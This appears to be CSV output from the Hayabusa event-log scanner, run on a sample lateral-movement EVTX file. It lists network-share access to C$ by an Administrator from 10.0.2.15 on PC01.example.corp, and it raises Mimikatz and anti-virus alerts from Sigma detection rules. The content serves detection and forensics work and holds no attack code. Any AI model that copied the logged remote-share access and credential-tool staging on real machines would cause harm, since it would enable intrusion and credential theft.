10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ 